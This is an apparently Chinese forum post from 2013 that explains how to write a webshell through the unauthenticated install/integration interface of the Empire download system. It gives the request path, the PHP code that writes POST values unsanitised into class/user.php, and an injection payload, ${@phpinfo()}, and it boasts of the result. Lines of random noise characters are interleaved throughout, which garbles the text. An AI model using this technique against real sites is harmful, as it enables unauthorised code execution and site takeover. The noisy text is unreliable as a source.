这是帝国的一套下载系统如图 ps(不需要任何账户和密码,直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口,如图 而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码 当我们0 K7 d- G0 @1 q" o9 M9 f! A
# f _9 a+ b! r( X% N# s& S* M2 B$ G+ Z T( e" f" @+ a. m
这是帝国的一套下载系统 如图# H2 Q" T1 A. Y0 L% m! E
ps(不需要任何账户和密码,直接写shell)
$ @: \& c" J! R: o由于很多站是由于下载要整合discuz 等等一些论坛....
V% z! f$ i. O8 o8 A! L3 D
, u9 u' f' R9 s2 E而帝国他又有一个万能接口,如图 : u. d1 J. `: {: x }/ [0 `5 S
' H0 k: f1 }; e) e i
+ A7 u2 X6 Q) H! L2 _& P* q7 m而这个接口很多人又不会删除,由此他带来了很大的安全隐患,导致直接getshell,下面分析代码
} }) a4 @$ }; l2 G/ r2 u' L% w4 A5 L; m2 W
当我们提交的时候,他地址是提交到index.php?install=1&setup=SetConfig 1. if($_GET['install']==1) 2. { 3. @include("../class/connect.php"); 4. @include("../class/db_sql.php"); 5. @include("../class/functions.php"); 6. $link=db_connect(); 7. $empire=new mysqlquery(); 8. if($setup=="SetConfig") 9. { 10. SetUserCOMConfig($_POST); 11. } 12. elseif($setup=="alter") 13. { 14. InstallUserCOM(); 15. } 16. elseif($setup=="update") 17. { 18. UpdateUserCOM(); 19. } 20. else 21. {} 复制代码 他这里开始调用一个SetUserCOMConfig的函数了,我们继续跟踪2 n1 v. S7 F; s! f+ d/ D# I
z4 a3 b P3 i# w在data/fun.php中的15行 z2 n' O4 `, H1 o+ M! b
* K' p2 ^' }1 m' }) a- y
我们可以看到这个函数 1. function SetUserCOMConfig($add){ 2. $filetext=ReadFiletext('data/user.php'); 3. if(empty($filetext)) 4. { 5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.'); 6. } 7. $vr=explode(",",ReturnRepUserVar()); 8. $count=count($vr); 9. for($i=0;$i<$count;$i++) 10. { 11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext); 12. } 13. //写入配置文件 14. $fp=@fopen("../class/user.php","w"); 15. if(!$fp) 16. { W6 T/ T; @4 @8 z; J4 i
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 18. } 19. @fputs($fp,$filetext); 20. @fclose($fp); 复制代码 .....//省略若干' S7 h! Y0 E4 U* x6 h
/ q* g2 H# i$ K& u. x# ?8 N这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);9 B( g6 ]' N( E, j
D4 o) H4 B# ^. F9 L9 S6 @) ?& r$ ^1 L他将传进来的变量进行了切割,然后赋给了$filetext
* r f! ~0 P, `2 n- Z; E& s( [
) b" Q* {4 b, G$ ~% F' T) w$ v1 U然后看下面 1. //写入配置文件 2. $fp=@fopen("../class/user.php","w"); 3. if(!$fp) 4. { 5. InstallShowMsg(' /class/user.php 文件权限没有设为0777,安装不成功.'); 6. } 7. @fputs($fp,$filetext); 复制代码 打开了一个class/user.php文件,然后将$filetext写入了
D4 O9 Z" k6 O5 x7 Q
" p- K% M q; H; _/ w0 K我们看看写入的结果,随便填一个
/ i" r. B9 H" f$ _) Y z8 I/ l# s! E: N( R) {+ a- ~0 s" _7 M
; a/ w& O6 o1 z( x* K9 n2 H D. d/ t( C
; a1 Y D" s$ N# _) n0 Y4 I
4 z0 b# {/ T& c/ B8 S0 h( f5 H1 z
2 S0 h% E6 @" [
6 _) |* H. Q2 c' T. `, Z: I( ~
5 B( D) h* x F- [( Q0 A- v: _ a! V8 U: ^/ g. B
: v( P( h$ q5 v/ n( O$ g9 y
5 [( U& L- }: }/ ?* r* f7 m
+ u2 g2 ?8 K& f# h; n8 P8 e) y1 ^: m
$ v. Y) W" ]5 U
+ r8 b1 @& B" T, I+ {, R
$ W1 B; ~* {5 q
# p4 K9 v" u: A
" }; v% S. c" \- G5 L) z3 _& N& ?' o @6 n' K! h% o- U
1 W. M0 P9 T" w8 g5 L1 B* w' |& Y/ T; l
所以我们淫荡点,写个${@phpinfo()}试试
9 x6 u9 a! m1 `" a( N) r1 g$ Y然后访问以下class/user.php这个文件
/ ?3 w8 C6 V8 }; T9 t6 f日了吧
+ Q9 W% D( X2 z/ A7 b$ E: K) k2 R& ?: Z5 ]2 ^) d9 U. [1 a
. Y# w! t# L* ?$ O
! s& I& _3 p+ I+ d) Z) Z& W |' k
* x) [# ~: @4 @3 C' ~+ ^, E; f
/ h: c* I: l( O% R* L# O! z | 
发表于 2013-1-23 09:34:37
收藏
支持
反对